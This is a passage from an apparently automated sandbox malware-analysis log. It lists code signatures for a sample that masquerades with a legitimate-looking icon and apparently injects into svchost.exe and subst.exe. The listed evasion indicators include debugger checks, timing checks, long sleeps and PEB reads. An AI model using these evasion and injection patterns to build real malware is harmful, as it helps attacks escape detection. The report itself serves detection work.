            Source: C:\Users\user\Desktop\7RsDGpyOQk.exe | Code function: 0_2_001C8B85 push ecx; ret | 0_2_001C8B98
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exe | Code function: 0_2_001CEC43 push esi; ret | 0_2_001CEC45
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exe | Code function: 0_2_001CED2C push edi; ret | 0_2_001CED2E
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00406075 push edx; ret | 1_2_00406076
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_004081FF push ss; retf | 1_2_00408207
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_004031B0 push eax; ret | 1_2_004031B2
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00404C14 push ebx; ret | 1_2_00404C25
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0040CE6D push esi; iretd | 1_2_0040CE6E
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00417F3B push ecx; retf C78Bh | 1_2_00417ED6
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_004087AB push ecx; retf | 1_2_004087AD
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B309AD push ecx; mov dword ptr [esp], ecx | 1_2_03B309B6
            Source: C:\Windows\SysWOW64\subst.exe | Code function: 4_2_030D225F pushad ; ret | 4_2_030D27F9
            Source: C:\Windows\SysWOW64\subst.exe | Code function: 4_2_030D27FA pushad ; ret | 4_2_030D27F9
            Source: C:\Windows\SysWOW64\subst.exe | Code function: 4_2_031009AD push ecx; mov dword ptr [esp], ecx | 4_2_031009B6
            Source: C:\Windows\SysWOW64\subst.exe | Code function: 4_2_030D283D push eax; iretd | 4_2_030D2858
            Source: C:\Windows\SysWOW64\subst.exe | Code function: 4_2_030D1368 push eax; iretd | 4_2_030D1369
            Source: C:\Windows\SysWOW64\subst.exe | Code function: 4_2_008500E0 push FFFFFFA5h; ret | 4_2_008500E5
            Source: C:\Windows\SysWOW64\subst.exe | Code function: 4_2_0085034C push FFFFFFFCh; iretd | 4_2_00850350
            Source: C:\Windows\SysWOW64\subst.exe | Code function: 4_2_0084AD2C push edx; ret | 4_2_0084AD5B
            Source: C:\Windows\SysWOW64\subst.exe | Code function: 4_2_00832EC2 push edx; ret | 4_2_00832EC3
            Source: C:\Windows\SysWOW64\subst.exe | Code function: 4_2_00853020 push es; iretd | 4_2_00853050
            Source: C:\Windows\SysWOW64\subst.exe | Code function: 4_2_0084B02D push ebx; ret | 4_2_0084B02E
            Source: C:\Windows\SysWOW64\subst.exe | Code function: 4_2_0083504C push ss; retf | 4_2_00835054
            Source: C:\Windows\SysWOW64\subst.exe | Code function: 4_2_0084D077 push cs; rep ret | 4_2_0084D075
            Source: C:\Windows\SysWOW64\subst.exe | Code function: 4_2_008372F0 pushfd ; retf | 4_2_008373D2
            Source: C:\Windows\SysWOW64\subst.exe | Code function: 4_2_008355F8 push ecx; retf | 4_2_008355FA
            Source: C:\Windows\SysWOW64\subst.exe | Code function: 4_2_008496FD push eax; retf | 4_2_008496FE

            Hooking and other Techniques for Hiding and Protection

            Source: initial sample | Icon embedded in binary file: icon matches a legit application icon: download (31).png
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exe | Code function: 0_2_001A4A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, | 0_2_001A4A35
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exe | Code function: 0_2_002255FD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, | 0_2_002255FD
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exe | Code function: 0_2_001C33C7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, | 0_2_001C33C7
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\subst.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\subst.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\subst.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\subst.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\subst.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Users\user\Desktop\7RsDGpyOQk.exe | API/Special instruction interceptor: Address: 34D3204
            Source: C:\Windows\SysWOW64\subst.exe | API/Special instruction interceptor: Address: 7FFE2220D324
            Source: C:\Windows\SysWOW64\subst.exe | API/Special instruction interceptor: Address: 7FFE2220D7E4
            Source: C:\Windows\SysWOW64\subst.exe | API/Special instruction interceptor: Address: 7FFE2220D944
            Source: C:\Windows\SysWOW64\subst.exe | API/Special instruction interceptor: Address: 7FFE2220D504
            Source: C:\Windows\SysWOW64\subst.exe | API/Special instruction interceptor: Address: 7FFE2220D544
            Source: C:\Windows\SysWOW64\subst.exe | API/Special instruction interceptor: Address: 7FFE2220D1E4
            Source: C:\Windows\SysWOW64\subst.exe | API/Special instruction interceptor: Address: 7FFE22210154
            Source: C:\Windows\SysWOW64\subst.exe | API/Special instruction interceptor: Address: 7FFE2220DA44
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B7096E rdtsc | 1_2_03B7096E
            Source: C:\Windows\SysWOW64\subst.exe | Window / User API: threadDelayed 9756
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exe | Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes | graph_0-100664
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exe | API coverage: 4.7 %
            Source: C:\Windows\SysWOW64\svchost.exe | API coverage: 0.7 %
            Source: C:\Windows\SysWOW64\subst.exe | API coverage: 2.6 %
            Source: C:\Windows\SysWOW64\subst.exe TID: 7872 | Thread sleep count: 215 > 30
            Source: C:\Windows\SysWOW64\subst.exe TID: 7872 | Thread sleep time: -430000s >= -30000s
            Source: C:\Windows\SysWOW64\subst.exe TID: 7872 | Thread sleep count: 9756 > 30
            Source: C:\Windows\SysWOW64\subst.exe TID: 7872 | Thread sleep time: -19512000s >= -30000s
            Source: C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe TID: 7896 | Thread sleep time: -85000s >= -30000s
            Source: C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe TID: 7896 | Thread sleep count: 38 > 30
            Source: C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe TID: 7896 | Thread sleep time: -57000s >= -30000s
            Source: C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe TID: 7896 | Thread sleep count: 41 > 30
            Source: C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe TID: 7896 | Thread sleep time: -41000s >= -30000s
            Source: C:\Windows\SysWOW64\subst.exe | Last function: Thread delayed
            Source: C:\Windows\SysWOW64\subst.exe | Last function: Thread delayed
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exe | Code function: 0_2_00204696 GetFileAttributesW,FindFirstFileW,FindClose, | 0_2_00204696
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exe | Code function: 0_2_0020C93C FindFirstFileW,FindClose, | 0_2_0020C93C
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exe | Code function: 0_2_0020C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, | 0_2_0020C9C7
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exe | Code function: 0_2_0020F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, | 0_2_0020F200
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exe | Code function: 0_2_0020F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, | 0_2_0020F35D
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exe | Code function: 0_2_0020F65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, | 0_2_0020F65E
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exe | Code function: 0_2_00203A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, | 0_2_00203A2B
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exe | Code function: 0_2_00203D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, | 0_2_00203D4E
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exe | Code function: 0_2_0020BF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, | 0_2_0020BF27
            Source: C:\Windows\SysWOW64\subst.exe | Code function: 4_2_0084BCA0 FindFirstFileW,FindNextFileW,FindClose, | 4_2_0084BCA0
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exe | Code function: 0_2_001A4AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, | 0_2_001A4AFE
            Source: UJCHZIamnVz.exe, 00000007.00000002.4162644558.000000000117F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll\
            Source: subst.exe, 00000004.00000002.4162582023.0000000002C80000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000008.00000002.2255444303.0000018CEB51E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exe | API call chain: ExitProcess graph end node | graph_0-97739
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exe | API call chain: ExitProcess graph end node | graph_0-97914
            Source: C:\Windows\SysWOW64\svchost.exe | Process information queried: ProcessInformation
            Source: C:\Windows\SysWOW64\svchost.exe | Process queried: DebugPort
            Source: C:\Windows\SysWOW64\subst.exe | Process queried: DebugPort
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B7096E rdtsc | 1_2_03B7096E
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00417473 LdrLoadDll, | 1_2_00417473
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exe | Code function: 0_2_002141FD BlockInput, | 0_2_002141FD
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exe | Code function: 0_2_001A3B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, | 0_2_001A3B4C
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exe | Code function: 0_2_001D5CCC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, | 0_2_001D5CCC
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exe | Code function: 0_2_0021C304 LoadLibraryA,GetProcAddress, | 0_2_0021C304
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exe | Code function: 0_2_034D3470 mov eax, dword ptr fs:[00000030h] | 0_2_034D3470
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exe | Code function: 0_2_034D34D0 mov eax, dword ptr fs:[00000030h] | 0_2_034D34D0
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exe | Code function: 0_2_034D1E70 mov eax, dword ptr fs:[00000030h] | 0_2_034D1E70
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B28397 mov eax, dword ptr fs:[00000030h] | 1_2_03B28397
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B28397 mov eax, dword ptr fs:[00000030h] | 1_2_03B28397
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B28397 mov eax, dword ptr fs:[00000030h] | 1_2_03B28397
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B2E388 mov eax, dword ptr fs:[00000030h] | 1_2_03B2E388
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B2E388 mov eax, dword ptr fs:[00000030h] | 1_2_03B2E388
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B2E388 mov eax, dword ptr fs:[00000030h] | 1_2_03B2E388
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B5438F mov eax, dword ptr fs:[00000030h] | 1_2_03B5438F
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B5438F mov eax, dword ptr fs:[00000030h] | 1_2_03B5438F
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B4E3F0 mov eax, dword ptr fs:[00000030h] | 1_2_03B4E3F0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B4E3F0 mov eax, dword ptr fs:[00000030h] | 1_2_03B4E3F0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B4E3F0 mov eax, dword ptr fs:[00000030h] | 1_2_03B4E3F0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B663FF mov eax, dword ptr fs:[00000030h] | 1_2_03B663FF
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B403E9 mov eax, dword ptr fs:[00000030h] | 1_2_03B403E9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B403E9 mov eax, dword ptr fs:[00000030h] | 1_2_03B403E9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B403E9 mov eax, dword ptr fs:[00000030h] | 1_2_03B403E9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B403E9 mov eax, dword ptr fs:[00000030h] | 1_2_03B403E9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B403E9 mov eax, dword ptr fs:[00000030h] | 1_2_03B403E9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B403E9 mov eax, dword ptr fs:[00000030h] | 1_2_03B403E9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B403E9 mov eax, dword ptr fs:[00000030h] | 1_2_03B403E9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B403E9 mov eax, dword ptr fs:[00000030h] | 1_2_03B403E9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BDE3DB mov eax, dword ptr fs:[00000030h] | 1_2_03BDE3DB
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BDE3DB mov eax, dword ptr fs:[00000030h] | 1_2_03BDE3DB
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BDE3DB mov ecx, dword ptr fs:[00000030h] | 1_2_03BDE3DB
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BDE3DB mov eax, dword ptr fs:[00000030h] | 1_2_03BDE3DB
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BD43D4 mov eax, dword ptr fs:[00000030h] | 1_2_03BD43D4
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BD43D4 mov eax, dword ptr fs:[00000030h] | 1_2_03BD43D4
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BEC3CD mov eax, dword ptr fs:[00000030h] | 1_2_03BEC3CD
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B3A3C0 mov eax, dword ptr fs:[00000030h] | 1_2_03B3A3C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B3A3C0 mov eax, dword ptr fs:[00000030h] | 1_2_03B3A3C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B3A3C0 mov eax, dword ptr fs:[00000030h] | 1_2_03B3A3C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B3A3C0 mov eax, dword ptr fs:[00000030h] | 1_2_03B3A3C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B3A3C0 mov eax, dword ptr fs:[00000030h] | 1_2_03B3A3C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B3A3C0 mov eax, dword ptr fs:[00000030h] | 1_2_03B3A3C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B383C0 mov eax, dword ptr fs:[00000030h] | 1_2_03B383C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B383C0 mov eax, dword ptr fs:[00000030h] | 1_2_03B383C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B383C0 mov eax, dword ptr fs:[00000030h] | 1_2_03B383C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B383C0 mov eax, dword ptr fs:[00000030h] | 1_2_03B383C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BB63C0 mov eax, dword ptr fs:[00000030h] | 1_2_03BB63C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C0634F mov eax, dword ptr fs:[00000030h] | 1_2_03C0634F
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B2C310 mov ecx, dword ptr fs:[00000030h] | 1_2_03B2C310
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B50310 mov ecx, dword ptr fs:[00000030h] | 1_2_03B50310
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B6A30B mov eax, dword ptr fs:[00000030h] | 1_2_03B6A30B
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B6A30B mov eax, dword ptr fs:[00000030h] | 1_2_03B6A30B
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B6A30B mov eax, dword ptr fs:[00000030h] | 1_2_03B6A30B
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BD437C mov eax, dword ptr fs:[00000030h] | 1_2_03BD437C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BB035C mov eax, dword ptr fs:[00000030h] | 1_2_03BB035C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BB035C mov eax, dword ptr fs:[00000030h] | 1_2_03BB035C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BB035C mov eax, dword ptr fs:[00000030h] | 1_2_03BB035C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BB035C mov ecx, dword ptr fs:[00000030h] | 1_2_03BB035C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BB035C mov eax, dword ptr fs:[00000030h] | 1_2_03BB035C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BB035C mov eax, dword ptr fs:[00000030h] | 1_2_03BB035C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BFA352 mov eax, dword ptr fs:[00000030h] | 1_2_03BFA352
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BD8350 mov ecx, dword ptr fs:[00000030h] | 1_2_03BD8350
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BB2349 mov eax, dword ptr fs:[00000030h] | 1_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BB2349 mov eax, dword ptr fs:[00000030h] | 1_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BB2349 mov eax, dword ptr fs:[00000030h] | 1_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BB2349 mov eax, dword ptr fs:[00000030h] | 1_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BB2349 mov eax, dword ptr fs:[00000030h] | 1_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BB2349 mov eax, dword ptr fs:[00000030h] | 1_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BB2349 mov eax, dword ptr fs:[00000030h] | 1_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BB2349 mov eax, dword ptr fs:[00000030h] | 1_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BB2349 mov eax, dword ptr fs:[00000030h] | 1_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BB2349 mov eax, dword ptr fs:[00000030h] | 1_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BB2349 mov eax, dword ptr fs:[00000030h] | 1_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BB2349 mov eax, dword ptr fs:[00000030h] | 1_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BB2349 mov eax, dword ptr fs:[00000030h] | 1_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BB2349 mov eax, dword ptr fs:[00000030h] | 1_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BB2349 mov eax, dword ptr fs:[00000030h] | 1_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B402A0 mov eax, dword ptr fs:[00000030h] | 1_2_03B402A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B402A0 mov eax, dword ptr fs:[00000030h] | 1_2_03B402A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C062D6 mov eax, dword ptr fs:[00000030h] | 1_2_03C062D6
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BC62A0 mov eax, dword ptr fs:[00000030h] | 1_2_03BC62A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BC62A0 mov ecx, dword ptr fs:[00000030h] | 1_2_03BC62A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BC62A0 mov eax, dword ptr fs:[00000030h] | 1_2_03BC62A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BC62A0 mov eax, dword ptr fs:[00000030h] | 1_2_03BC62A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BC62A0 mov eax, dword ptr fs:[00000030h] | 1_2_03BC62A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BC62A0 mov eax, dword ptr fs:[00000030h] | 1_2_03BC62A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B6E284 mov eax, dword ptr fs:[00000030h] | 1_2_03B6E284
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B6E284 mov eax, dword ptr fs:[00000030h] | 1_2_03B6E284
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BB0283 mov eax, dword ptr fs:[00000030h] | 1_2_03BB0283
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BB0283 mov eax, dword ptr fs:[00000030h] | 1_2_03BB0283
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BB0283 mov eax, dword ptr fs:[00000030h] | 1_2_03BB0283
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B402E1 mov eax, dword ptr fs:[00000030h] | 1_2_03B402E1
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B402E1 mov eax, dword ptr fs:[00000030h] | 1_2_03B402E1
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B402E1 mov eax, dword ptr fs:[00000030h] | 1_2_03B402E1
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B3A2C3 mov eax, dword ptr fs:[00000030h] | 1_2_03B3A2C3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B3A2C3 mov eax, dword ptr fs:[00000030h] | 1_2_03B3A2C3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B3A2C3 mov eax, dword ptr fs:[00000030h] | 1_2_03B3A2C3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B3A2C3 mov eax, dword ptr fs:[00000030h] | 1_2_03B3A2C3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B3A2C3 mov eax, dword ptr fs:[00000030h] | 1_2_03B3A2C3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B2823B mov eax, dword ptr fs:[00000030h] | 1_2_03B2823B
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BE0274 mov eax, dword ptr fs:[00000030h] | 1_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BE0274 mov eax, dword ptr fs:[00000030h] | 1_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BE0274 mov eax, dword ptr fs:[00000030h] | 1_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BE0274 mov eax, dword ptr fs:[00000030h] | 1_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BE0274 mov eax, dword ptr fs:[00000030h] | 1_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BE0274 mov eax, dword ptr fs:[00000030h] | 1_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BE0274 mov eax, dword ptr fs:[00000030h] | 1_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BE0274 mov eax, dword ptr fs:[00000030h] | 1_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BE0274 mov eax, dword ptr fs:[00000030h] | 1_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BE0274 mov eax, dword ptr fs:[00000030h] | 1_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BE0274 mov eax, dword ptr fs:[00000030h] | 1_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BE0274 mov eax, dword ptr fs:[00000030h] | 1_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B34260 mov eax, dword ptr fs:[00000030h] | 1_2_03B34260
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B34260 mov eax, dword ptr fs:[00000030h] | 1_2_03B34260
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B34260 mov eax, dword ptr fs:[00000030h] | 1_2_03B34260
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B2826B mov eax, dword ptr fs:[00000030h] | 1_2_03B2826B
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B2A250 mov eax, dword ptr fs:[00000030h] | 1_2_03B2A250
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B36259 mov eax, dword ptr fs:[00000030h] | 1_2_03B36259
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BEA250 mov eax, dword ptr fs:[00000030h] | 1_2_03BEA250
